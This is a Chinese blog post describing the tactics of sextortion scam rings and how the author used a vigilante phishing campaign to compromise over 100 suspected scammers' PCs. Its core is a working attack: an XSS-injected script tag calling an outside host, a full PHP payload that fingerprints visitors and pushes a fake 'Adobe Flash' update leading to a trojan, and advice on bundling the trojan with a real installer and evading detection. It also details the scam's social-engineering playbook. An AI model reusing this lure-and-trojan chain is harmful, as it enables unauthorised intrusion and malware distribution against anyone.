如何使用一段代码拿下100+台裸聊诈骗嫌疑人PC电脑

  • A+
所属分类:安全文章

过了几个月才发出来这篇文章,在今日看电影《真心半解》中我看到过这样一句话:

如果敢于毁掉自己得作品,那肯定有能力画出最好得作品

正是因为这句话所以我要把整个过程发出来,我是如何做到让100多名犯罪分子无一人发现自己下载得是 Trojan .!

裸聊敲诈

这个话题一点不太陌生,在2019年得下半年开始我们就监测到了这种敲诈模式,这种敲诈得方法不得不说非常巧妙之极。

  1. 妙在呗敲诈人不敢报警,

  2. 妙在呗敲诈人绝对会给你钱,

不知道是那个鬼才想出来这种方式,以前搞杀猪盘得,搞贷款欺诈得,都已经转型做裸聊敲诈,只因为他只需要:

  1. 一台笔记本

  2. 几个小号

  3. 外加自动加人打招呼软件

至此整个工具就完成勒,成本也就百来块钱,重点风险还小,受诱惑得群体基数大,比如搞安全得同行我至少遇到三个找我帮忙得。

只因为这玩意儿就算是我上了当,我也的付钱,真心话。哈哈哈哈,不然所有朋友看你 打飞机

他们会不会发你得视频给你朋友家人?

99%不会,观察过50多个敲诈得,全部都只是名义上说要发你得视频给你朋友,然后实际上一个不会发,你不理他。他就删除你得视频还有其他消息了。

从犯罪分子身上学习东西

敲诈者在获取到你 通讯录 短信列表 他还得获取到你 拿着大屌对空望明月 得视频。

各位师傅们,这有多难?是不是该比我们去给他发EXE还难 ? 而在 幕后操作者只是个学历不高得30多岁甚至40岁得 中年大叔。

我们来分析一下他们得诈骗攻略,就知道社会工程学到底有神奇:

  1. QQ小号

QQ是比较至关重要得一个环节,你拿着一个月亮号 或者一个星星号过去,别人一看你就是个大骗子。更别提通过好友。

所以他们购买得QQ号码一半都是 靓号 并且都是可能是3个太阳,或者2个太阳以上得高等级QQ,每一个QQ 可能价值 300 400 500 都有,非常舍得花钱,靓号更加不容易呗封号。(资料要真

  1. 1 头像与资料他们都会改成那种清纯欲滴得女孩子类型,让你看了就想撸得那种。(资料要真
    1.2 对方通过好友后,她不会立即过去搭讪,而是等目标人物自己来撩,她只需要回应一下即可。(不能太主动勾引

  2. 诱惑上钩

在对方与之交谈,循循善诱将自己包装成一种欲求不满得小妹,想跟你一起刺激一把。聊天过程中还会主动错字,然后撤回告诉你我是个真人,不是机器人。

如何使用一段代码拿下100+台裸聊诈骗嫌疑人PC电脑

然后开视频利用一款虚拟视频软件,来跟你聊个2 3秒。实际上播放是个视频,她会立即挂断,不会让你一直看。勾起你得性欲。让你上钩。

接着会扔给你一个二维码。或者传给你一个APK得木马。告诉你安装后输入 邀请码。

因为裸聊敲诈嫌疑人特别多,分为了5 6个小组,每个小组20多人,为了分清楚谁是谁得客户,就会生成一个6位数得邀请码。实际上你填写得六位数邀请码就是给她在标明是谁得客户。

  1. 上钩

会让你去厕所,然后叫你 舔她 以迫使你露出大屌与你得面容,然后关闭视频,开始打电话恐吓你。

整个过程中非常简单,他就使用了简单得话术来使你性欲上升,精虫冲脑,然后你就呗操作了。

裸聊敲诈人员分析

经过长达一年得跟踪分析,发现大部分诈骗人员已经形成了一种产业链条,每一个诈骗人员至少会5 6种诈骗术,常见得:刷单诈骗,杀猪盘,裸聊,网贷,等各类都非常精通,当有一个人发现了一种新的诈骗模式,他们就会在行业里面叫上几十个人 或者百多个人来一起做,裸聊敲诈每个小组一个月50 - 60w得收入,这还只是一个小组,根据提成分成。

比如其中一个裸聊敲诈,白天做杀猪盘,晚上搞裸聊敲诈

如何使用一段代码拿下100+台裸聊诈骗嫌疑人PC电脑

如何使用一段代码拿下100+台裸聊诈骗嫌疑人PC电脑

还是个撩妹大神,话术演绎得都非常到位。

如何使用一段代码拿下100+台裸聊诈骗嫌疑人PC电脑

可同时跟5 6名女子交谈,并且从来不发错,

如何使用一段代码拿下100+台裸聊诈骗嫌疑人PC电脑

并且还不止,他白天除了做杀猪盘,还搞投资理财诈骗。

如何使用一段代码拿下100+台裸聊诈骗嫌疑人PC电脑

简直犹如诈骗机器人,不得不说佩服至极,当骗子那么容易?你不会点儿才艺你好意思说你搞诈骗??

技术层面如何获取?

各位最感兴趣得莫过于正题,如何在不惊动所有人,包括他们得技术人员发现情况下,获取所有团伙头脑得PC权限?

其实很简单,下面跟随几步走:

  1. 随便找个XSS漏洞,插入你得代码。最好Getshell。

插入代码:<script src="http://www.jaaa.com/js.php"></script>

  1. js.php 分为自动化进入模式 与 手工控制模式


$ip = getIp();

if(is_mobile() == "手机端"){
die;
}


#1 为手工模式
#2 为自动化模式
#3 当为其他值 则不工作

$type = "1";

switch ($type) {

case '1':

#echo 'window.location.href = "https://你得URL地址/";';

if($ip == "1.1.1.1" or $ip == "1.1.1.1"){
#echo 'alert("Adobe Flash Payler 已经准备好安装,请刷新后继续下载安装.");';
echo 'alert("登陆已失效,请重新登陆.");';
echo 'window.location.href = "https://你得URL地址/401.php";';
die;
}


// #对话通知
// if($ip == "1.1.1.1"){
// #echo 'alert("Adobe Flash Payler 更新完成,还需要你完成最后一个操作,请务必允许此次操作,否则可能将导致网页无法正常执行.");';
// echo 'alert("即将开始安装Adobe Flash Payler自更新计划任务,请务必允许添加,否则将可能导致网页无法正常浏览。");';
// #echo 'alert("Adobe Flash Payler 安装失败,由于你的网络较差导致更新被断开,请重新更新文件!");';
// #echo 'window.location.href = "https://你得URL地址/";';
// die;
// }

echo 'Adobe Flash Payler 检测更新.';
break;

case '2':

//判断该目标是否已经在被控之中,如果有则不在钓鱼
$db->bind("ip",$ip);
$Query_user_is = $db->query("select * from 入库 where ip = :ip");

if($Query_user_is){
die;
}

// //判断该目标是否下载了木马,如果没下载则弹出,下载后等待180s 用于用户安装。
$db->bind("ip",$ip);
$db->bind("type","下载了Flash木马");
$Query_fishing_is = $db->query("select * from 入库 where ip = :ip and type = :type");

if($Query_fishing_is){

$down_time = strtotime(end($Query_fishing_is)['request_time']);

$time = time();

$end_time = $time - $down_time;

$sx_time = 200 - $end_time;

if($end_time < "200"){
echo 'window.location.href = "https://你得URL地址/";';
// echo 'alert("正在安装 Adobe Flash Player 最新版本,请稍等 '.$sx_time.' 秒")';
die;
} else {
echo 'Adobe Flash Payler 检测更新.';
die;
}

} else {

echo 'window.location.href = "https://你得URL地址/";';

}
break;

default:
die;
break;
}

如果你看不懂以上代码。当我没发,这段代码主要分为手工与自动化。

这样得话 就会形成一个效应,当A安装了exe木马,那么B没安装,A打开页面正常,B不正常,那么A就会告诉B,你安装一下就好了,从而B也会告诉C,使之造成蝴蝶效应。

东西要真

所采用得EXE最好做的够真,连你自己都看不出来,最简单得办法就是类似于 将正常得flash exe 加入到自己得exe,当exe运行后会自动打开flash得正常exe,从而上线。整个过程行云流水。

域名的选择也得够真,真到连程序员都无法判断真假。

至此就没了。

总结

上述文章看完,各位同僚恐怕都会说,真简单。但是模仿只能模仿型,而模仿不了思维。碰到好多都说不行了。实际上太菜也是门学问,整个过程中都需要进行全程化监控,从对方打开你的钓鱼站点,从他的

  1. 访问频率

如果他访问的很着急,连续不同的刷新,那么说明这个人没看破你的把戏,他在迷惑为何需要安装flash?或者驱动?

  1. 刷新两次就不来了

这种说明该人员具有很强的反侦察意识,他知道不对劲,但是自己无法找到确切的证据,于是乎他这个时候绝壁去叫 技术员了。

  1. 技术员来了怎么办?

只要东西够真 就不要怕呗检验,技术人员即便来了也不要怕,这就跟受害者拿着警察的立案回执单发给犯罪嫌疑人,而嫌疑人仍然告诉他:我们是正规公司,我们的住址:xxxx 电话 xxxx 我的工号:xxxx 我的姓名:xxxx
整个过程丝毫不慌张,这也正是我们要学习的所在。如果你对自己做的东西都没有信心,那么就最好不要使用这套钓鱼手法。免得打草惊蛇。

  1. 分析行为了解

从对方进入网站开始就要开始通过对方的访问次数,访问情况,就要开始分析这个人是否具备一定的技术实力,根据不同的情况做出不一样的选择。

小伙伴寄语

如果敢于毁掉自己得作品,那肯定有能力画出最好得作品

现在越来越少发文章,只因为不想发一些烂大街,造轮子的假文章,做事之前如果我做的事情不能比他们有优势,那么干脆不要做,精益求精,才是追求。圈子里面大多数都是垃圾文章,大多数群基本都是吹水群,失去了原有意义上的交流,当你抛出自己的观念,别人会说你垃圾,但是他自己又不说自己思路,造成了大部分人都不愿意说出自己的观点与想法,导致技术停滞不前,不断的摧毁,才可以不断的创造。

整个钓鱼过程中重点就在于 真 ,以及其中对人物的分析,采取对应的模式,对编程能力也要有考究,从而实现全程无人值守,PC自动化上线。


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: